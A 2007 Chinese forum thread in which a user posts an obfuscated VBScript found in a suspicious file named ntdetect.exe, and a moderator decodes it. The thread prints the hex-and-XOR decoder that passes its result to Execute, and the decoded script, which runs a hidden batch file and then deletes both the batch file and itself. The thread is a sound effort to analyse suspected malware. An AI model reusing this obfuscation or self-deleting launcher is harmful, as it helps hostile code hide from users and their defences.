中国DOS联盟论坛 - Powered by Discuz! Board

标题: 请教一段脚本代码，可能来自木马部分.... [打印本页]

作者: lsh1611 时间: 2007-11-20 17:23 标题: 请教一段脚本代码，可能来自木马部分....

在c根目录发现了一个ntdetect.exe文件，代码是文本：

Function fan(lovesss)
For i=1 to Len(lovesss) Step 2
fan=fan & Chr(CLng("&H" & Mid(lovesss,i,2)) Xor 23)
Next
End Function
chenzi="587937526565786537457264627A723759726F631A1D44726337447F727B7B372A3754657276637258757D7274633F35406474657E676339447F727B7B353E1A1D447F727B7B396562793F35742D4B7A7E746578647871636439757663353E1A1D64726337447F727B7B2A5978637F7E79701A1D44726337716478372A3754657276637258757D7274633F354474657E67637E797039517E7B72446E6463727A58757D727463353E1A1D404474657E676339447B7272673726272727371A1D5E713771647839517E7B72526F7E6463643F35742D4B7A7E746578647871636439757663353E37437F7279377164783953727B726372517E7B723F35742D4B7A7E746578647871636439757663353E1A1D7164783953727B726372517E7B723F404474657E6763394474657E676359767A723E"
Execute fan(chenzi)

不知道中间的数据是否有什么问题，能转换为其他各式? 这里哪位兄弟知道？

作者: lxmxn 时间: 2007-11-20 18:16
直接利用上面的fan函数：

Quote:

On Error Resume Next
Set Shell = CreateObject("Wscript.Shell")
Shell.run("c:\microsofts.bat")
set Shell=Nothing
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000
If fso.FileExists("c:\microsofts.bat") Then fso.DeleteFile("c:\microsofts.bat")
fso.DeleteFile(WScript.ScriptName)

作者: lsh1611 时间: 2007-11-21 09:34
知道了，多谢版主！不知道是否有对vbs进行调试的工具。

搜索了一下，好像vbsedit可以...

[ Last edited by lsh1611 on 2007-11-21 at 09:41 AM ]

作者: lxmxn 时间: 2007-11-21 12:54
嗯，前任版主3742668曾经发过一个关于VBS的资料和编辑器的贴子，你搜索一下吧。